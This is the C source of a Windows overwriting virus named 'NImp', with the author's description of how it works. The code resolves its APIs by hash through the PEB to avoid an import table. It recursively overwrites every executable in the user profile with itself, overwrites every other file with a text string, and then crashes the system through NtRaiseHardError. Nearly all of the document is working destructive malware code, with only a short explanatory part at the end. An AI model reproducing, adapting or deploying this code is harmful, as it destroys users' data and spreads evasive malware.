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- #include <Windows.h>
- #include "ntdll.h"
- {
- OptionAbortRetryIgnore,
- OptionOk,
- OptionOkCancel,
- OptionRetryCancel,
- OptionYesNo,
- OptionYesNoCancel,
- OptionShutdownSystem,
- OptionOkNoWait,
- OptionCancelTryContinue
- typedef enum _HARDERROR_RESPONSE
- {
- ResponseReturnToCaller,
- ResponseNotHandled,
- ResponseAbort,
- ResponseCancel,
- ResponseIgnore,
- ResponseNo,
- ResponseOk,
- ResponseRetry,
- ResponseYes,
- ResponseTryAgain,
- ResponseContinue
- typedef DWORD (WINAPI *pGetEnvironmentVariableA)(
- LPCSTR lpName,
- LPSTR lpBuffer,
- DWORD nSize
- );
- typedef DWORD (WINAPI *pGetModuleFileNameA)(
- HMODULE hModule,
- LPSTR lpFilename,
- DWORD nSize
- );
- typedef BOOL (WINAPI *pCopyFileA)(
- LPCSTR lpExistingFileName,
- LPCSTR lpNewFileName,
- BOOL bFailIfExists
- );
- typedef HANDLE (WINAPI *pFindFirstFileA)(
- LPCSTR lpFileName,
- LPWIN32_FIND_DATAA lpFindFileData
- );
- typedef BOOL (WINAPI *pFindNextFileA)(
- HANDLE hFindFile,
- LPWIN32_FIND_DATAA lpFindFileData
- );
- typedef BOOL (WINAPI *pFindClose)(
- HANDLE hFindFile
- );
- typedef HANDLE (WINAPI *pCreateFileA)(
- LPCSTR lpFileName,
- DWORD dwDesiredAccess,
- DWORD dwShareMode,
- LPSECURITY_ATTRIBUTES lpSecurityAttributes,
- DWORD dwCreationDisposition,
- DWORD dwFlagsAndAttributes,
- HANDLE hTemplateFile
- );
- typedef BOOL (WINAPI *pWriteFile)(
- HANDLE hFile,
- LPCVOID lpBuffer,
- DWORD nNumberOfBytesToWrite,
- LPDWORD lpNumberOfBytesWritten,
- LPOVERLAPPED lpOverlapped
- );
- typedef void (WINAPI *pSleep)(DWORD Timeout);
- typedef NTSTATUS (NTAPI *pNtClose)(HANDLE Handle);
- typedef NTSTATUS (NTAPI *pNtRaiseHardError)(
- NTSTATUS ErrorStatus,
- ULONG NumberOfParameters,
- ULONG UnicodeStringParameterMask,
- PULONG_PTR Parameters,
- ULONG ValidResponseOptions,
- PULONG Response
- );
- typedef NTSTATUS (NTAPI *pRtlAdjustPrivilege)(ULONG Privilege,BOOLEAN Enable,BOOLEAN CurrentThread,PBOOLEAN OldValue);
- typedef int (__cdecl *p_sprintf)(char* str,char* format,...);
- typedef char* (__cdecl *p_strstr)(char* str,char* substr);
- typedef struct _NIMP_FUNCTION_TABLE
- {
- pGetEnvironmentVariableA fnGetEnvironmentVariableA;
- pGetModuleFileNameA fnGetModuleFileNameA;
- pCopyFileA fnCopyFileA;
- pFindFirstFileA fnFindFirstFileA;
- pFindNextFileA fnFindNextFileA;
- pFindClose fnFindClose;
- pCreateFileA fnCreateFileA;
- pWriteFile fnWriteFile;
- pSleep fnSleep;
- pNtRaiseHardError fnNtRaiseHardError;
- pRtlAdjustPrivilege fnRtlAdjustPrivilege;
- pNtClose fnNtClose;
- p_sprintf fn_sprintf;
- p_strstr fn_strstr;
- char NImpFileName[120];
- ULONG WINAPI NImpComputeHash(LPSTR String)
- {
- PUCHAR ptr=(PUCHAR)String;
- ULONG Hash=0;
- while(*ptr)
- {
- Hash=((Hash<<8)+Hash+*ptr)^(*ptr<<16);
- ptr++;
- }
- return Hash;
- }
- PVOID WINAPI NImpGetFunctionFromHash(PVOID Module,ULONG Hash)
- {
- PULONG Function,Name;
- PUSHORT Ordinal;
- ULONG i;
- pINH=(PIMAGE_NT_HEADERS)((PUCHAR)Module+pIDH->e_lfanew);
- Function=(PULONG)((PUCHAR)Module+pIED->AddressOfFunctions);
- Name=(PULONG)((PUCHAR)Module+pIED->AddressOfNames);
- Ordinal=(PUSHORT)((PUCHAR)Module+pIED->AddressOfNameOrdinals);
- for(i=0;i<pIED->NumberOfNames;i++)
- {
- if(NImpComputeHash((char*)Module+Name[i])==Hash)
- {
- return (PVOID)((PUCHAR)Module+Function[Ordinal[i]]);
- }
- }
- return NULL;
- }
- void WINAPI NImpZeroMemory(PVOID Buffer,ULONG Length)
- {
- PUCHAR ptr=(PUCHAR)Buffer;
- ULONG i;
- for(i=0;i<Length;i++)
- {
- ptr[i]=0;
- }
- }
- void WINAPI NImpOverwriteFile(LPSTR FileName)
- {
- HANDLE hFile;
- DWORD write;
- char str[]="NImp <span class="searchlite">virus</span> by zwclose7!";
- {
- NImpFunctionTable.fnWriteFile(hFile,str,sizeof(str),&write,NULL);
- NImpFunctionTable.fnNtClose(hFile);
- }
- }
- void WINAPI NImpInfectFiles(LPSTR Directory)
- {
- HANDLE hFind;
- char SearchName[1024],FullPath[1024];
- WIN32_FIND_DATAA FindData;
- NImpZeroMemory(SearchName,sizeof(SearchName));
- NImpFunctionTable.fn_sprintf(SearchName,"%s\\*",Directory);
- hFind=NImpFunctionTable.fnFindFirstFileA(SearchName,&FindData);
- {
- while(NImpFunctionTable.fnFindNextFileA(hFind,&FindData))
- {
- if(FindData.cFileName[0]=='.')
- {
- continue;
- }
- NImpZeroMemory(FullPath,sizeof(FullPath));
- NImpFunctionTable.fn_sprintf(FullPath,"%s\\%s",Directory,FindData.cFileName);
- if(FindData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
- {
- NImpInfectFiles(FullPath);
- }
- else
- {
- if(NImpFunctionTable.fn_strstr(FindData.cFileName,".exe"))
- {
- NImpFunctionTable.fnCopyFileA(NImpFileName,FullPath,FALSE);
- }
- else
- {
- NImpOverwriteFile(FullPath);
- }
- }
- NImpFunctionTable.fnSleep(10);
- }
- NImpFunctionTable.fnFindClose(hFind);
- }
- }
- void WINAPI NImpMain()
- {
- PVOID Kernel32Base,NtdllBase;
- ULONG Response;
- PPEB Peb;
- char Path[120];
- Peb=NtCurrentPeb();
- NImpZeroMemory(Path,sizeof(Path));
- NImpZeroMemory(&NImpFunctionTable,sizeof(NIMP_FUNCTION_TABLE));
- NImpZeroMemory(NImpFileName,sizeof(NImpFileName));
- Ldr=CONTAINING_RECORD(Peb->Ldr->InMemoryOrderModuleList.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
- Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
- NtdllBase=Ldr->DllBase;
- Ldr=CONTAINING_RECORD(Ldr->InMemoryOrderLinks.Flink,LDR_DATA_TABLE_ENTRY,InMemoryOrderLinks.Flink);
- Kernel32Base=Ldr->DllBase;
- NImpFunctionTable.fnGetEnvironmentVariableA=(pGetEnvironmentVariableA)NImpGetFunctionFromHash(Kernel32Base,0x3363dd1c);
- NImpFunctionTable.fnGetModuleFileNameA=(pGetModuleFileNameA)NImpGetFunctionFromHash(Kernel32Base,0x2d6f58c8);
- NImpFunctionTable.fnCopyFileA=(pCopyFileA)NImpGetFunctionFromHash(Kernel32Base,0x932fb15c);
- NImpFunctionTable.fnFindFirstFileA=(pFindFirstFileA)NImpGetFunctionFromHash(Kernel32Base,0xbe28834a);
- NImpFunctionTable.fnFindNextFileA=(pFindNextFileA)NImpGetFunctionFromHash(Kernel32Base,0x85776e1);
- NImpFunctionTable.fnFindClose=(pFindClose)NImpGetFunctionFromHash(Kernel32Base,0x7223b77);
- NImpFunctionTable.fnCreateFileA=(pCreateFileA)NImpGetFunctionFromHash(Kernel32Base,0xd83eb415);
- NImpFunctionTable.fnWriteFile=(pWriteFile)NImpGetFunctionFromHash(Kernel32Base,0xa5e7378b);
- NImpFunctionTable.fnSleep=(pSleep)NImpGetFunctionFromHash(Kernel32Base,0xf5d3c0f9);
- NImpFunctionTable.fnNtClose=(pNtClose)NImpGetFunctionFromHash(NtdllBase,0x5a4bbb8);
- NImpFunctionTable.fnNtRaiseHardError=(pNtRaiseHardError)NImpGetFunctionFromHash(NtdllBase,0x602b783f);
- NImpFunctionTable.fnRtlAdjustPrivilege=(pRtlAdjustPrivilege)NImpGetFunctionFromHash(NtdllBase,0xb411bb44);
- NImpFunctionTable.fn_sprintf=(p_sprintf)NImpGetFunctionFromHash(NtdllBase,0xc07d3806);
- NImpFunctionTable.fn_strstr=(p_strstr)NImpGetFunctionFromHash(NtdllBase,0x534bc1b2);
- NImpFunctionTable.fnGetEnvironmentVariableA("userprofile",Path,sizeof(Path));
- NImpFunctionTable.fnGetModuleFileNameA(NULL,NImpFileName,sizeof(NImpFileName));
- NImpInfectFiles(Path);
- NImpFunctionTable.fnRtlAdjustPrivilege(19,TRUE,FALSE,&bl);
- NImpFunctionTable.fnNtRaiseHardError(0xC000026A,0,0,NULL,OptionShutdownSystem,&Response);
- }
- NImp is a overwriting virus written in C++. The name NImp stands for "No import table", because it's executable has no import table. The virus resolves all need functions by hashes.
- The virus will search for files in user profile. If the file is executable file, the virus will infect by overwriting the file with the virus. Otherwise, the virus will overwrite the file with a string.
- How the virus works
- 1) The virus get the address of PEB.
- 2) The virus read the loader data from PEB to get the base address of kernel32 and ntdll.
- 3) The virus resolves all needed functions by hashes.
- 4) The virus search for files in user profile.
- 5) If the file is executable file, the virus will infect it by overwriting the file with the virus. Otherwise, the virus will overwrite the file with a string.
- 6) After searching all files, the virus calls RtlAdjustPrivilege to enable SeShutdownPrivilege, and then calls NtRaiseHardError to crash the operating system.
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